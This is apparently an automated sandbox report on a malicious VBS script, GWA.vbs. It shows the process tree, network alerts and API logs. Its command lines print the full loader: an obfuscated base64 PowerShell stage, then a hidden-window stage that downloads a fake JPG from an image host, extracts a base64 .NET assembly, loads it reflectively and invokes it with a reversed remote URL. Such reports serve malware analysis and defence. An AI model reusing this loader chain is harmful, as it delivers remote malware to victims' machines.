Summary | ZeroBOX

GWA.vbs

Generic Malware Antivirus Hide_URL PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 Sept. 21, 2023, 9:38 a.m. Sept. 21, 2023, 9:41 a.m.
Size 293.6KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 e2782eab20480b1650cd78de803acd82
SHA256 3b4bdc3082032bb19dc547cfbf9a64ebb6436af544fe6210e36c82275b483e35
CRC32 00C154FF
ssdeep 768:3doQkS9/kS9/kS9/kS9/kS9/kS9RGl1XryVU62hkS9/kS9/kS9/kS9/kS9/kS9N+:3R01ymOKYuJKLB
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\GWA.vbs

    3016
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBz◀▶C8◀▶M◀▶◀▶w◀▶DQ◀▶Lw◀▶2◀▶DE◀▶Mw◀▶v◀▶DU◀▶MQ◀▶1◀▶C8◀▶bwBy◀▶Gk◀▶ZwBp◀▶G4◀▶YQBs◀▶C8◀▶cgB1◀▶G0◀▶c◀▶Bf◀▶HY◀▶YgBz◀▶F8◀▶YQBu◀▶HQ◀▶aQB2◀▶G0◀▶LgBq◀▶H◀▶◀▶Zw◀▶/◀▶DE◀▶Ng◀▶5◀▶DU◀▶MQ◀▶0◀▶Dc◀▶Mg◀▶1◀▶DU◀▶Jw◀▶7◀▶CQ◀▶dwBl◀▶GI◀▶QwBs◀▶Gk◀▶ZQBu◀▶HQ◀▶I◀▶◀▶9◀▶C◀▶◀▶TgBl◀▶Hc◀▶LQBP◀▶GI◀▶agBl◀▶GM◀▶d◀▶◀▶g◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶TgBl◀▶HQ◀▶LgBX◀▶GU◀▶YgBD◀▶Gw◀▶aQBl◀▶G4◀▶d◀▶◀▶7◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Hc◀▶ZQBi◀▶EM◀▶b◀▶Bp◀▶GU◀▶bgB0◀▶C4◀▶R◀▶Bv◀▶Hc◀▶bgBs◀▶G8◀▶YQBk◀▶EQ◀▶YQB0◀▶GE◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBV◀▶HI◀▶b◀▶◀▶p◀▶Ds◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶u◀▶EU◀▶bgBj◀▶G8◀▶Z◀▶Bp◀▶G4◀▶ZwBd◀▶Do◀▶OgBV◀▶FQ◀▶Rg◀▶4◀▶C4◀▶RwBl◀▶HQ◀▶UwB0◀▶HI◀▶aQBu◀▶Gc◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶KQ◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBT◀▶FQ◀▶QQBS◀▶FQ◀▶Pg◀▶+◀▶Cc◀▶Ow◀▶k◀▶GU◀▶bgBk◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBF◀▶E4◀▶R◀▶◀▶+◀▶D4◀▶Jw◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶SQBu◀▶GQ◀▶ZQB4◀▶E8◀▶Zg◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶KQ◀▶7◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶TwBm◀▶Cg◀▶J◀▶Bl◀▶G4◀▶Z◀▶BG◀▶Gw◀▶YQBn◀▶Ck◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶ZQ◀▶g◀▶D◀▶◀▶I◀▶◀▶t◀▶GE◀▶bgBk◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶d◀▶◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶Cs◀▶PQ◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶LgBM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶7◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶C◀▶◀▶J◀▶Bz◀▶HQ◀▶YQBy◀▶HQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶Ds◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBT◀▶HU◀▶YgBz◀▶HQ◀▶cgBp◀▶G4◀▶Zw◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶s◀▶C◀▶◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶p◀▶Ds◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶QwBv◀▶G4◀▶dgBl◀▶HI◀▶d◀▶Bd◀▶Do◀▶OgBG◀▶HI◀▶bwBt◀▶EI◀▶YQBz◀▶GU◀▶Ng◀▶0◀▶FM◀▶d◀▶By◀▶Gk◀▶bgBn◀▶Cg◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶Ck◀▶Ow◀▶k◀▶Gw◀▶bwBh◀▶GQ◀▶ZQBk◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQ◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶UgBl◀▶GY◀▶b◀▶Bl◀▶GM◀▶d◀▶Bp◀▶G8◀▶bg◀▶u◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQBd◀▶Do◀▶OgBM◀▶G8◀▶YQBk◀▶Cg◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶p◀▶Ds◀▶J◀▶B0◀▶Hk◀▶c◀▶Bl◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶b◀▶Bv◀▶GE◀▶Z◀▶Bl◀▶GQ◀▶QQBz◀▶HM◀▶ZQBt◀▶GI◀▶b◀▶B5◀▶C4◀▶RwBl◀▶HQ◀▶V◀▶B5◀▶H◀▶◀▶ZQ◀▶o◀▶Cc◀▶RgBp◀▶GI◀▶ZQBy◀▶C4◀▶S◀▶Bv◀▶G0◀▶ZQ◀▶n◀▶Ck◀▶Ow◀▶k◀▶G0◀▶ZQB0◀▶Gg◀▶bwBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶d◀▶B5◀▶H◀▶◀▶ZQ◀▶u◀▶Ec◀▶ZQB0◀▶E0◀▶ZQB0◀▶Gg◀▶bwBk◀▶Cg◀▶JwBW◀▶EE◀▶SQ◀▶n◀▶Ck◀▶LgBJ◀▶G4◀▶dgBv◀▶Gs◀▶ZQ◀▶o◀▶CQ◀▶bgB1◀▶Gw◀▶b◀▶◀▶s◀▶C◀▶◀▶WwBv◀▶GI◀▶agBl◀▶GM◀▶d◀▶Bb◀▶F0◀▶XQ◀▶g◀▶Cg◀▶JwB0◀▶Hg◀▶d◀▶◀▶u◀▶DQ◀▶Mg◀▶0◀▶DM◀▶cgBn◀▶C8◀▶b◀▶B0◀▶C8◀▶Nw◀▶2◀▶DE◀▶Lg◀▶x◀▶DY◀▶MQ◀▶u◀▶DY◀▶NQ◀▶x◀▶C4◀▶N◀▶◀▶5◀▶C8◀▶Lw◀▶6◀▶H◀▶◀▶d◀▶B0◀▶Gg◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶GI◀▶bwBz◀▶HQ◀▶YQ◀▶n◀▶Ck◀▶KQ◀▶='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""

      2204
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/613/515/original/rump_vbs_antivm.jpg?1695147255';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4243rg/lt/761.161.651.49//:ptth' , 'bosta'))"

        2312

IP Address Status Action
104.21.45.138 Active Moloch
164.124.101.2 Active Moloch
222.122.182.234 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49165 -> 104.21.45.138:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49165
104.21.45.138:443
C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br 67:68:c4:e4:aa:54:e1:fd:f0:50:01:73:1e:da:cf:48:0c:17:0d:34

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:187
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/613/515/original/rump_
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: vbs_antivm.jpg?1695147255';$webClient = New-Object System.Net.WebClient;$imageB
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: ytes = $webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encod
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ing]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: <BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageT
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ext.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIn
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: dex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Con
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: vert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.As
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: sembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$met
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: hod = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4243rg/lt/761.161.6
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: 51.49//:ptth' , 'bosta'))
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000010f
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: At line:1 char:250
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/613/515/original/rump_
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: vbs_antivm.jpg?1695147255';$webClient = New-Object System.Net.WebClient;$imageB
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: ytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: UTF8.GetString <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: <BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageT
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: ext.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIn
console_handle: 0x0000016f
1 1 0

WriteConsoleW

buffer: dex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Con
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: vert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.As
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: sembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$met
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: hod = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4243rg/lt/761.161.6
console_handle: 0x000001ab
1 1 0

WriteConsoleW

buffer: 51.49//:ptth' , 'bosta'))
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001c3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001cf
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x000001ef
1 1 0

WriteConsoleW

buffer: At line:1 char:356
console_handle: 0x000001fb
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/613/515/original/rump_
console_handle: 0x00000207
1 1 0

WriteConsoleW

buffer: vbs_antivm.jpg?1695147255';$webClient = New-Object System.Net.WebClient;$imageB
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: ytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::
console_handle: 0x0000021f
1 1 0

WriteConsoleW

buffer: UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE6
console_handle: 0x0000022b
1 1 0

WriteConsoleW

buffer: 4_END>>';$startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageT
console_handle: 0x00000237
1 1 0

WriteConsoleW

buffer: ext.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIn
console_handle: 0x00000243
1 1 0

WriteConsoleW

buffer: dex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Con
console_handle: 0x0000025b
1 1 0

WriteConsoleW

buffer: vert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.As
console_handle: 0x00000267
1 1 0

WriteConsoleW

buffer: sembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$met
console_handle: 0x00000273
1 1 0

WriteConsoleW

buffer: hod = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4243rg/lt/761.161.6
console_handle: 0x0000027f
1 1 0

WriteConsoleW

buffer: 51.49//:ptth' , 'bosta'))
console_handle: 0x0000028b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b42a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b3fe0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b3fe0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b3fe0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b3be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b3be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b3be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b3be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b3be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b3be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b36e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b36e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b36e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b41e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b41e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b41e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b3da0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b41e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b41e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b41e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b41e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b41e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b41e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b41e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b40a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b37a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b37a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00672108
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00672788
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00672788
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00672788
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00672248
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00672248
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00672248
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00672248
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00672248
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00672248
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 1048576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2204
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2204
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02632000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02642000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

